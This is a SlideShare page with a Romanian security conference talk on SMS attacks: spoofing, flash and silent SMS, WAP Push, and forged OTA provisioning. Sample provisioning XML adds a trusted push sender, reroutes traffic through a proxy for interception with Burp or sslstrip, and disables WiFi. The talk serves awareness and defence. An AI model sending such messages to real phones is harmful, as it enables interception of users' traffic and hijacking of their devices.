SlideShare a Scribd company logo
1 of 41
Download to read offline
Securitate mobila –
 Atacuri prin SMS
       Prezentator:
     Bogdan ALECU
     http://m-sec.net
    Twitter: @msecnet
Informatii generale despre SMS
Amenintari
WAP
Interceptare trafic de date
Demo
Informatii generale
SMS - Short Message Service reprezinta un
mod de comunicare prin mesaje text intre
telefoanele mobile / fixe, utilizand un protocol
standardizat. Este un mod de comunicare
eficace; utilizatorul scrie un text, apasa SEND si
mesajul e livrat aproape instant catre destinatar.
Folosit pentru mai multe scopuri: MMS –
Multimedia Messaging Service, OTA – Over The
Air – configurarea telefonului, notificari pentru
mesageria vocala, email, fax, microplati – plata
unor sume mici pentru diferite servicii =>
SECURITATE!
Informatii generale
“Un dispozitiv mobil activ trebuie sa fie
capabil de a primi un mesaj scurt de
tipul TPDU - Transfer protocol data unit
- (SMS-DELIVER) in orice moment,
indiferent daca exista un apel sau trafic
de date in derulare. Un raport va fi
trimis intotdeauna catre SC (Serviciul
de mesaje); confirmand fie ca tel a
primit mesajul sau ca mesajul nu a fost
livrat, incluzind si motivul refuzului.”
ETSI TS 100 901 V7.5.0 (2001-12), pag
13
Amenintari - SMS
SMS SPAM
SMS spoofing
Notificari SMS
Alte tipuri
Amenintari - SMS
  SMS SPAM
Companiile ofera servicii de publicitate
  prin SMS
Mesaje cu castiguri false
Inginerie sociala – “Suna-ma urgent pe nr
  asta: 0900323421! Mama”
Amenintari - SMS
  SMS Spoofing
Servicii online ce permit modificarea
  expeditorului (numeric / alfanumeric)
Greu de oprit, mai ales daca tinem cont de
  roaming
Eficienta mai mare in atacurile de tip
  inginerie sociala
Amenintari - SMS
  Notificari SMS
Voicemail
Fax
E-mail
Video
Utilizatorul nu poate scoate icon-ul de
  notificare asupra primirii unui astfel de
  mesaj
Amenintari - SMS
Notificari SMS
(voicemail)
Amenintari - SMS
Notificari SMS
(email)
Amenintari - SMS
  Alte tipuri
Flash SMS (Class 0) – utilizatorul vede
  mesajul direct, fara a intra in Inbox
Silent SMS – DCS 0xC0 = Message Waiting
  Indication Group: Discard Message
Amenintari - SMS
  Alte tipuri
Flash SMS
Amenintari - SMS
  Alte tipuri
Silent SMS
WAP
Wireless Application Protocol
Arhitectura de retea specifica
Set de reguli
Limbaj specific: Wireless Markup Language
(WML)
Pagini HTML ajustate pentru dimensiunea
ecranului telefonului
WAP
WAP Push
Permite trimiterea de continut WAP cu o
interventie minima din partea utilizatorului
2 tipuri: Service Indication / Service Load
WAP Push
Service Indication (SI) permite trimiterea
de notificari utilizatorului intr-un mod
asincron
WAP Push
Service Indication (SI)
WAP Push
Service Load (SL) determina “aplicatia” de
pe telefon sa incarce si execute un
serviciu
WAP Push
Service Load (SL)
WAP Push - securitate
   Teoria: Doar un anumit numar este autorizat pentru
   trimitere; Practica: daca nu e configurat bine, un telefon
   accepta de la orice numar astfel de mesaje
   Pe Windows Mobile trebuiesc verificate setarile din
   HKLMSecurityPoliciesPolicies
; SL Message Policy ; (default: SECROLE_PPG_TRUSTED)
   [HKEY_LOCAL_MACHINESecurityPoliciesPolicies]
   "0000100c"=dword:800 ; SI Message Policy ; (default:
   SECROLE_PPG_AUTH | SECROLE_PPG_TRUSTED)
   [HKEY_LOCAL_MACHINESecurityPoliciesPolicies]
   "0000100d"=dword:c00
WAP Push - securitate
SECROLE_PPG_TRUSTED: Trusted Push Proxy
Gateway. Messages assigned this role indicate
that the content sent by the Push Initiator is
trusted by the Push Proxy Gateway. This role
implies that the device trusts the Push Proxy
Gateway (SECROLE_TRUSTED_PPG).
SECROLE_PPG_AUTH: Push Initiator
Authenticated. Messages assigned this role
indicate that the Push Initiator is authenticated by
the Push Proxy Gateway. This role implies that
the device trusts the Push Proxy Gateway
(SECROLE_TRUSTED_PPG).
WAP Push - securitate
WAP
Configurarea telefonului pentru acces la Internet
/ date poate fi facuta manual
Pentru o configurare mai usoara, rapida si
pentru eventualele schimbari, a fost creat un
standard ce permite configurarea de la distanta
Programarea Over The Air (OTA) foloseste
standardul OMA – Open Mobile Alliance
Programarea se face prin SMS-uri special
concepute
WAP - provisioning
Foloseste protocolul WAP
WBXML (WAP Binary XML) prin Wireless
Application Environment
Wireless Session Protocol
Wireless Datagram Protocol
SMS
WAP - provisioning
Configurarea se scrie in XML (conform
specificatiilor de la
http://www.openmobilealliance.org)

XML-ul se va codifica in WAP Binary XML
WBXML se va encapsula intr-o data de tip
Wireless Session Protocol
Datele se vor codifica intr-un mesaj Push, definit
in Wireless Session Protocol
WAP - provisioning
Mesajul Push contine diferiti parametri,
unul fiind parametrul “SEC” pentru
autentificare pe baza de “cheie” comuna
USERPIN: string ASCII codificat in
zecimale
NETWPIN: cheia este specifica retelei si
cunoscuta (teoretic) doar de catre operator
USERNETWPIN: combinatie a celor 2
WAP - provisioning
NETWPIN: IMSI = MCC+MNC+MSIN
(Mobile Subscription Identification
Number)
Pret: 2-5 euro-centi
In general limitat pentru companii, se cere
un volum mare de interogari
WAP - provisioning
<wap-provisioningdoc>
<characteristic type="NAPDEF">
<parm name="NAME" value="NewAPN"/>
<parm name="NAPID" value="NewAPN_NAPID_ME"/>
<parm name="BEARER" value="GSM-GPRS"/>
<parm name="NAP-ADDRESS" value="apn.operator.ro"/>
<parm name="NAP-ADDRTYPE" value="APN"/>
</characteristic>
<characteristic type=“APPLICATION">
<parm name="NAME" value="NewAPN"/>
<parm name="APPID" value="w2"/>
<parm name="TO-NAPID" value="NewAPN_NAPID_ME"/>
</characteristic>
<wap-provisioningdoc>
WAP - provisioning
<wap-provisioningdoc> - contine toata informatia
  transmisa
<characteristic …> - grupeaza informatia in unitati
  logice
<… value="NAPDEF"/> - configuram un nou
  network access point
<parm name="APPID" value="w2"/> -
 mapeaza configuratia la activitatile de
 browsing

Informatii la http://www.openmobilealliance.org
WAP - provisioning
<wap-provisioningdoc>
<characteristic type="BOOTSTRAP">
<parm name="NAME" value=“Operator NET"/>
<parm name="PROXY-ID"
  value="OpNET_Proxy"/>
</characteristic>
<characteristic type="NAPDEF">
<parm name="NAME" value="OpNET"/>
<parm name="NAPID" value="OpNET_NAPID"/>
<parm name="BEARER" value="GSM-GPRS"/>
<parm name="NAP-ADDRESS" value="net"/>
<parm name="NAP-ADDRTYPE" value="APN"/>
</characteristic>
WAP - provisioning
<characteristic type="PXLOGICAL">
<parm name="NAME" value="OpNET"/>
<parm name="PROXY-ID" value="OpNET_Proxy"/>
<characteristic type="PXPHYSICAL">
<parm name="PHYSICAL-PROXY-ID"
   value="OpNET_PhProxy"/>
<parm name="PXADDR" value=“192.168.1.1"/>
<parm name="PXADDRTYPE" value="IPV4"/>
<parm name="TO-NAPID" value="OpNET_NAPID"/>
<characteristic type="PORT">
<parm name="PORTNBR" value="8080"/>
</characteristic>
</characteristic>
</characteristic>
WAP - provisioning
<characteristic type="APPLICATION">
<parm name="APPID" value="w2"/>
<parm name="NAME" value="OpNET"/>
<parm name="TO-PROXY"
  value="OpNET_Proxy"/>
<characteristic type="RESOURCE">
<parm name="NAME" value="OpNET"/>
<parm name="URI"
  value="http://www.google.com"/>
<parm name="STARTPAGE"/>
</characteristic>
</characteristic>
</wap-provisioningdoc>
WAP - provisioning
Teoretic aceasta configurare poate fi facuta
doar de catre operator, de la un numar
predefinit
Putem analiza SMS-ul prin WireShark
Putem adauga un alt numar
WAP - provisioning
<?xml version="1.0"?>
<!DOCTYPE wap-provisioningdoc PUBLIC "-//WAPFORUM//DTD PROV 1.0//EN"
              wap-                         "-
     "http://www.wapforum.org/DTD/prov.dtd">
     "http://www.wapforum.org/DTD/prov.dtd">
<wap-provisioningdoc version="1.1">
 wap-
<characteristic type="BOOTSTRAP">
<parm name="NAME" value=“Nume"/>
                       value=“ Nume"/>
</characteristic>
<characteristic type="PXLOGICAL">
<parm name="NAME" value=“Nume"/>
                       value=“ Nume"/>
<parm name="PROXY-ID" value="Trusted_Proxy"/>
       name="PROXY-        value="Trusted_Proxy"/>
<parm name="NAME" value="Trusted Proxy"/>
<characteristic type="PXPHYSICAL">
<parm name="PHYSICAL-PROXY-ID" value="Trusted_PhProxy"/>
       name="PHYSICAL- PROXY-          value="Trusted_PhProxy"/>
<parm name="PXADDR" value="40711111111"/>
<parm name="PXADDRTYPE" value="E164"/>
<parm name="TO-NAPID" value="Trusted_NAPID"/>
       name="TO-           value="Trusted_NAPID"/>
<parm name="PUSHENABLED" value="1"/>
<parm name="PULLENABLED" value="1"/>
</characteristic>
</characteristic>
<characteristic type="NAPDEF">
<parm name="NAME" value="Op"/>
<parm name="NAPID" value="Trusted_NAPID"/>
                       value="Trusted_NAPID"/>
<parm name="BEARER" value="GSM-SMS"/>
                          value="GSM-
<parm name="NAME" value="Trusted Proxy"/>
<parm name="NAP-ADDRESS" value=" 40711111111 "/>
       name="NAP-
<parm name="NAP-ADDRTYPE" value="E164"/>
       name="NAP-
</characteristic>
WAP - provisioning
<wap-provisioningdoc>
 <characteristic type="NetworkPolicy">
  <characteristic type="WiFi">
   <characteristic type="Settings">
     <parm name="Disabled" value="1"/>
   </characteristic>
  </characteristic>
 </characteristic>
</wap-provisioningdoc>
Interceptare trafic
Traficul trece prin proxy-ul nostru
Varianta 1 – Burp Proxy
Interceptare trafic
Traficul trece prin proxy-ul nostru
Varianta 2 – sslstrip
http://www.thoughtcrime.org/software/sslstrip/
Interceptare trafic
DEMO
Protectie
Operatorul poate filtra aceste tipuri de
mesaje
Producatorii de telefoane trebuie sa se
concentreze mai mult pe securitate
Verificati constant (la fel cum faceti cu
factura / creditul disponibil) setarile de
Internet
Intrebari?

More Related Content

Similar to Securitatea mobila - Atacuri prin SMS

Microservice Come in Systems
Microservice Come in SystemsMicroservice Come in Systems
Microservice Come in SystemsMarkus Eisele
 
Interoperable Web Services with JAX-WS and WSIT
Interoperable Web Services with JAX-WS and WSITInteroperable Web Services with JAX-WS and WSIT
Interoperable Web Services with JAX-WS and WSITCarol McDonald
 
Wireless application protocol
Wireless application protocolWireless application protocol
Wireless application protocolgit tech
 
Dynamic Service Chaining
Dynamic Service Chaining Dynamic Service Chaining
Dynamic Service Chaining Tail-f Systems
 
How lagom helps to build real world microservice systems
How lagom helps to build real world microservice systemsHow lagom helps to build real world microservice systems
How lagom helps to build real world microservice systemsMarkus Eisele
 
Microservices Manchester: How Lagom Helps to Build Real World Microservice Sy...
Microservices Manchester: How Lagom Helps to Build Real World Microservice Sy...Microservices Manchester: How Lagom Helps to Build Real World Microservice Sy...
Microservices Manchester: How Lagom Helps to Build Real World Microservice Sy...OpenCredo
 
Wap architecture and wml script
Wap architecture and wml scriptWap architecture and wml script
Wap architecture and wml scriptishmecse13
 
Camara Application Programming Interface (API) Overview.pdf
Camara Application Programming Interface (API) Overview.pdfCamara Application Programming Interface (API) Overview.pdf
Camara Application Programming Interface (API) Overview.pdfDimitrisLogothetis10
 
Wireless iSeries Performance Monitoring
Wireless iSeries Performance MonitoringWireless iSeries Performance Monitoring
Wireless iSeries Performance Monitoringmboadway
 
Cyberoam cr200ing
Cyberoam cr200ingCyberoam cr200ing
Cyberoam cr200ingHuu Hieu
 
Cyberoam cr200ing
Cyberoam cr200ingCyberoam cr200ing
Cyberoam cr200ingHuu Hieu
 
SOA with C, C++, PHP and more
SOA with C, C++, PHP and moreSOA with C, C++, PHP and more
SOA with C, C++, PHP and moreWSO2
 
Sns en-sn160 w-datasheet-201702
Sns en-sn160 w-datasheet-201702Sns en-sn160 w-datasheet-201702
Sns en-sn160 w-datasheet-201702Balázs Antók
 
[WSO2 Integration Summit Nairobi 2019] Ballerina - Cloud Native Programming L...
[WSO2 Integration Summit Nairobi 2019] Ballerina - Cloud Native Programming L...[WSO2 Integration Summit Nairobi 2019] Ballerina - Cloud Native Programming L...
[WSO2 Integration Summit Nairobi 2019] Ballerina - Cloud Native Programming L...WSO2
 
Wap Security Arch Presentation
Wap Security Arch PresentationWap Security Arch Presentation
Wap Security Arch PresentationRam Dutt Shukla
 
dist-access. access control in distributed systemspdf
dist-access. access control in distributed systemspdfdist-access. access control in distributed systemspdf
dist-access. access control in distributed systemspdfNohaNagy5
 
introduction to Windows Comunication Foundation
introduction to Windows Comunication Foundationintroduction to Windows Comunication Foundation
introduction to Windows Comunication Foundationredaxe12
 

Similar to Securitatea mobila - Atacuri prin SMS (20)

Microservice Come in Systems
Microservice Come in SystemsMicroservice Come in Systems
Microservice Come in Systems
 
Interoperable Web Services with JAX-WS and WSIT
Interoperable Web Services with JAX-WS and WSITInteroperable Web Services with JAX-WS and WSIT
Interoperable Web Services with JAX-WS and WSIT
 
Wireless application protocol
Wireless application protocolWireless application protocol
Wireless application protocol
 
Dynamic Service Chaining
Dynamic Service Chaining Dynamic Service Chaining
Dynamic Service Chaining
 
How lagom helps to build real world microservice systems
How lagom helps to build real world microservice systemsHow lagom helps to build real world microservice systems
How lagom helps to build real world microservice systems
 
Microservices Manchester: How Lagom Helps to Build Real World Microservice Sy...
Microservices Manchester: How Lagom Helps to Build Real World Microservice Sy...Microservices Manchester: How Lagom Helps to Build Real World Microservice Sy...
Microservices Manchester: How Lagom Helps to Build Real World Microservice Sy...
 
Wap architecture and wml script
Wap architecture and wml scriptWap architecture and wml script
Wap architecture and wml script
 
Camara Application Programming Interface (API) Overview.pdf
Camara Application Programming Interface (API) Overview.pdfCamara Application Programming Interface (API) Overview.pdf
Camara Application Programming Interface (API) Overview.pdf
 
Wireless iSeries Performance Monitoring
Wireless iSeries Performance MonitoringWireless iSeries Performance Monitoring
Wireless iSeries Performance Monitoring
 
Cyberoam cr200ing
Cyberoam cr200ingCyberoam cr200ing
Cyberoam cr200ing
 
Cyberoam cr200ing
Cyberoam cr200ingCyberoam cr200ing
Cyberoam cr200ing
 
SOA with C, C++, PHP and more
SOA with C, C++, PHP and moreSOA with C, C++, PHP and more
SOA with C, C++, PHP and more
 
Sns en-sn160 w-datasheet-201702
Sns en-sn160 w-datasheet-201702Sns en-sn160 w-datasheet-201702
Sns en-sn160 w-datasheet-201702
 
[WSO2 Integration Summit Nairobi 2019] Ballerina - Cloud Native Programming L...
[WSO2 Integration Summit Nairobi 2019] Ballerina - Cloud Native Programming L...[WSO2 Integration Summit Nairobi 2019] Ballerina - Cloud Native Programming L...
[WSO2 Integration Summit Nairobi 2019] Ballerina - Cloud Native Programming L...
 
Wap Security Arch Presentation
Wap Security Arch PresentationWap Security Arch Presentation
Wap Security Arch Presentation
 
WAP
WAPWAP
WAP
 
dist-access. access control in distributed systemspdf
dist-access. access control in distributed systemspdfdist-access. access control in distributed systemspdf
dist-access. access control in distributed systemspdf
 
introduction to Windows Comunication Foundation
introduction to Windows Comunication Foundationintroduction to Windows Comunication Foundation
introduction to Windows Comunication Foundation
 
Web Services
Web ServicesWeb Services
Web Services
 
Web Services
Web ServicesWeb Services
Web Services
 

More from DefCamp

Remote Yacht Hacking
Remote Yacht HackingRemote Yacht Hacking
Remote Yacht HackingDefCamp
 
Mobile, IoT, Clouds… It’s time to hire your own risk manager!
Mobile, IoT, Clouds… It’s time to hire your own risk manager!Mobile, IoT, Clouds… It’s time to hire your own risk manager!
Mobile, IoT, Clouds… It’s time to hire your own risk manager!DefCamp
 
The Charter of Trust
The Charter of TrustThe Charter of Trust
The Charter of TrustDefCamp
 
Internet Balkanization: Why Are We Raising Borders Online?
Internet Balkanization: Why Are We Raising Borders Online?Internet Balkanization: Why Are We Raising Borders Online?
Internet Balkanization: Why Are We Raising Borders Online?DefCamp
 
Bridging the gap between CyberSecurity R&D and UX
Bridging the gap between CyberSecurity R&D and UXBridging the gap between CyberSecurity R&D and UX
Bridging the gap between CyberSecurity R&D and UXDefCamp
 
Secure and privacy-preserving data transmission and processing using homomorp...
Secure and privacy-preserving data transmission and processing using homomorp...Secure and privacy-preserving data transmission and processing using homomorp...
Secure and privacy-preserving data transmission and processing using homomorp...DefCamp
 
Drupalgeddon 2 – Yet Another Weapon for the Attacker
Drupalgeddon 2 – Yet Another Weapon for the AttackerDrupalgeddon 2 – Yet Another Weapon for the Attacker
Drupalgeddon 2 – Yet Another Weapon for the AttackerDefCamp
 
Economical Denial of Sustainability in the Cloud (EDOS)
Economical Denial of Sustainability in the Cloud (EDOS)Economical Denial of Sustainability in the Cloud (EDOS)
Economical Denial of Sustainability in the Cloud (EDOS)DefCamp
 
Trust, but verify – Bypassing MFA
Trust, but verify – Bypassing MFATrust, but verify – Bypassing MFA
Trust, but verify – Bypassing MFADefCamp
 
Threat Hunting: From Platitudes to Practical Application
Threat Hunting: From Platitudes to Practical ApplicationThreat Hunting: From Platitudes to Practical Application
Threat Hunting: From Platitudes to Practical ApplicationDefCamp
 
Building application security with 0 money down
Building application security with 0 money downBuilding application security with 0 money down
Building application security with 0 money downDefCamp
 
Implementation of information security techniques on modern android based Kio...
Implementation of information security techniques on modern android based Kio...Implementation of information security techniques on modern android based Kio...
Implementation of information security techniques on modern android based Kio...DefCamp
 
Lattice based Merkle for post-quantum epoch
Lattice based Merkle for post-quantum epochLattice based Merkle for post-quantum epoch
Lattice based Merkle for post-quantum epochDefCamp
 
The challenge of building a secure and safe digital environment in healthcare
The challenge of building a secure and safe digital environment in healthcareThe challenge of building a secure and safe digital environment in healthcare
The challenge of building a secure and safe digital environment in healthcareDefCamp
 
Timing attacks against web applications: Are they still practical?
Timing attacks against web applications: Are they still practical?Timing attacks against web applications: Are they still practical?
Timing attacks against web applications: Are they still practical?DefCamp
 
Tor .onions: The Good, The Rotten and The Misconfigured
Tor .onions: The Good, The Rotten and The Misconfigured Tor .onions: The Good, The Rotten and The Misconfigured
Tor .onions: The Good, The Rotten and The Misconfigured DefCamp
 
Needles, Haystacks and Algorithms: Using Machine Learning to detect complex t...
Needles, Haystacks and Algorithms: Using Machine Learning to detect complex t...Needles, Haystacks and Algorithms: Using Machine Learning to detect complex t...
Needles, Haystacks and Algorithms: Using Machine Learning to detect complex t...DefCamp
 
We will charge you. How to [b]reach vendor’s network using EV charging station.
We will charge you. How to [b]reach vendor’s network using EV charging station.We will charge you. How to [b]reach vendor’s network using EV charging station.
We will charge you. How to [b]reach vendor’s network using EV charging station.DefCamp
 
Connect & Inspire Cyber Security
Connect & Inspire Cyber SecurityConnect & Inspire Cyber Security
Connect & Inspire Cyber SecurityDefCamp
 
The lions and the watering hole
The lions and the watering holeThe lions and the watering hole
The lions and the watering holeDefCamp
 

More from DefCamp (20)

Remote Yacht Hacking
Remote Yacht HackingRemote Yacht Hacking
Remote Yacht Hacking
 
Mobile, IoT, Clouds… It’s time to hire your own risk manager!
Mobile, IoT, Clouds… It’s time to hire your own risk manager!Mobile, IoT, Clouds… It’s time to hire your own risk manager!
Mobile, IoT, Clouds… It’s time to hire your own risk manager!
 
The Charter of Trust
The Charter of TrustThe Charter of Trust
The Charter of Trust
 
Internet Balkanization: Why Are We Raising Borders Online?
Internet Balkanization: Why Are We Raising Borders Online?Internet Balkanization: Why Are We Raising Borders Online?
Internet Balkanization: Why Are We Raising Borders Online?
 
Bridging the gap between CyberSecurity R&D and UX
Bridging the gap between CyberSecurity R&D and UXBridging the gap between CyberSecurity R&D and UX
Bridging the gap between CyberSecurity R&D and UX
 
Secure and privacy-preserving data transmission and processing using homomorp...
Secure and privacy-preserving data transmission and processing using homomorp...Secure and privacy-preserving data transmission and processing using homomorp...
Secure and privacy-preserving data transmission and processing using homomorp...
 
Drupalgeddon 2 – Yet Another Weapon for the Attacker
Drupalgeddon 2 – Yet Another Weapon for the AttackerDrupalgeddon 2 – Yet Another Weapon for the Attacker
Drupalgeddon 2 – Yet Another Weapon for the Attacker
 
Economical Denial of Sustainability in the Cloud (EDOS)
Economical Denial of Sustainability in the Cloud (EDOS)Economical Denial of Sustainability in the Cloud (EDOS)
Economical Denial of Sustainability in the Cloud (EDOS)
 
Trust, but verify – Bypassing MFA
Trust, but verify – Bypassing MFATrust, but verify – Bypassing MFA
Trust, but verify – Bypassing MFA
 
Threat Hunting: From Platitudes to Practical Application
Threat Hunting: From Platitudes to Practical ApplicationThreat Hunting: From Platitudes to Practical Application
Threat Hunting: From Platitudes to Practical Application
 
Building application security with 0 money down
Building application security with 0 money downBuilding application security with 0 money down
Building application security with 0 money down
 
Implementation of information security techniques on modern android based Kio...
Implementation of information security techniques on modern android based Kio...Implementation of information security techniques on modern android based Kio...
Implementation of information security techniques on modern android based Kio...
 
Lattice based Merkle for post-quantum epoch
Lattice based Merkle for post-quantum epochLattice based Merkle for post-quantum epoch
Lattice based Merkle for post-quantum epoch
 
The challenge of building a secure and safe digital environment in healthcare
The challenge of building a secure and safe digital environment in healthcareThe challenge of building a secure and safe digital environment in healthcare
The challenge of building a secure and safe digital environment in healthcare
 
Timing attacks against web applications: Are they still practical?
Timing attacks against web applications: Are they still practical?Timing attacks against web applications: Are they still practical?
Timing attacks against web applications: Are they still practical?
 
Tor .onions: The Good, The Rotten and The Misconfigured
Tor .onions: The Good, The Rotten and The Misconfigured Tor .onions: The Good, The Rotten and The Misconfigured
Tor .onions: The Good, The Rotten and The Misconfigured
 
Needles, Haystacks and Algorithms: Using Machine Learning to detect complex t...
Needles, Haystacks and Algorithms: Using Machine Learning to detect complex t...Needles, Haystacks and Algorithms: Using Machine Learning to detect complex t...
Needles, Haystacks and Algorithms: Using Machine Learning to detect complex t...
 
We will charge you. How to [b]reach vendor’s network using EV charging station.
We will charge you. How to [b]reach vendor’s network using EV charging station.We will charge you. How to [b]reach vendor’s network using EV charging station.
We will charge you. How to [b]reach vendor’s network using EV charging station.
 
Connect & Inspire Cyber Security
Connect & Inspire Cyber SecurityConnect & Inspire Cyber Security
Connect & Inspire Cyber Security
 
The lions and the watering hole
The lions and the watering holeThe lions and the watering hole
The lions and the watering hole
 

Recently uploaded

Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Patryk Bandurski
 
APIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April  Automation LPDGAPIForce Zurich 5 April  Automation LPDG
APIForce Zurich 5 April Automation LPDGMarianaLemus7
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Enterprise Knowledge
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubKalema Edgar
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupFlorian Wilhelm
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Scott Keck-Warren
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationSlibray Presentation
 
Unlocking the Potential of the Cloud for IBM Power Systems
Unlocking the Potential of the Cloud for IBM Power SystemsUnlocking the Potential of the Cloud for IBM Power Systems
Unlocking the Potential of the Cloud for IBM Power SystemsPrecisely
 
Pigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitecturePixlogix Infotech
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsMemoori
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...Fwdays
 
Artificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning eraArtificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning eraDeakin University
 
Bluetooth Controlled Car with Arduino.pdf
Bluetooth Controlled Car with Arduino.pdfBluetooth Controlled Car with Arduino.pdf
Bluetooth Controlled Car with Arduino.pdfngoud9212
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationRidwan Fadjar
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsRizwan Syed
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 3652toLead Limited
 

Recently uploaded (20)

Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
 
APIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April  Automation LPDGAPIForce Zurich 5 April  Automation LPDG
APIForce Zurich 5 April Automation LPDG
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food Manufacturing
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding Club
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project Setup
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
 
Unlocking the Potential of the Cloud for IBM Power Systems
Unlocking the Potential of the Cloud for IBM Power SystemsUnlocking the Potential of the Cloud for IBM Power Systems
Unlocking the Potential of the Cloud for IBM Power Systems
 
Pigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping Elbows
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC Architecture
 
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptxE-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial Buildings
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
 
Artificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning eraArtificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning era
 
Bluetooth Controlled Car with Arduino.pdf
Bluetooth Controlled Car with Arduino.pdfBluetooth Controlled Car with Arduino.pdf
Bluetooth Controlled Car with Arduino.pdf
 
DMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special EditionDMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special Edition
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 Presentation
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL Certs
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
 

Securitatea mobila - Atacuri prin SMS

  • 1. Securitate mobila – Atacuri prin SMS Prezentator: Bogdan ALECU http://m-sec.net Twitter: @msecnet
  • 2. Informatii generale despre SMS Amenintari WAP Interceptare trafic de date Demo
